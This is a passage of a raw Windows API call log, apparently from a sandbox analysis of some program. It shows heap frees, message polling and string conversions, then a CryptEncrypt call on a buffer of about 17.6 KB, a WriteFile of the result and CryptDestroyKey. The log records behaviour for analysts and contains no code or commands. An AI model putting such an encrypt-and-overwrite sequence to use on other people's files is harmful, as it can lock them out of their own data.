lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0149.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.216] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.216] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.216] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.216] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0149.216] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0149.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0149.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0149.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ab38e0 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.222] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa408, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.223] CryptEncrypt (in: hKey=0x9e20f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x44c4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x44c8) returned 1 [0149.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.223] CharLowerBuffW (in: lpsz="byte[17608]", cchLength=0xb | out: lpsz="byte[17608]") returned 0xb [0149.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.223] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.223] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.223] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.223] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.224] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.224] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa480, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.224] CryptEncrypt (in: hKey=0x9e20f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ab38e0*, pdwDataLen=0x8cef60*=0x44c4, dwBufLen=0x44c8 | out: pbData=0x2ab38e0*, pdwDataLen=0x8cef60*=0x44c8) returned 1 [0149.224] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.224] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.224] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.225] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.225] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.225] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.225] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.225] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.225] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.225] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.225] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.225] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.225] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.225] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.225] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.225] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.226] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.227] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.227] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.227] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.227] WriteFile (in: hFile=0x4ec, lpBuffer=0x2a9e610*, nNumberOfBytesToWrite=0x44c8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a9e610*, lpNumberOfBytesWritten=0x8cf5e4*=0x44c8, lpOverlapped=0x0) returned 1 [0149.228] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.228] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.228] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0149.228] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.228] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0149.228] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.228] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.228] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.228] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.228] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.228] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.229] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.229] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa2b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0149.229] CryptDestroyKey (hKey=0x9e20f8) returned 1 [0149.229] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.229] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.229] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.229] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.229] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.229] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.229] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.229] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.229] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.229] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.229] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.229] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.229] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.229] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.235] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.235] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.235] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.235] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.235] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.235] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.235] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.235] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.235] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.235] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.235] PeekMessageW (in: 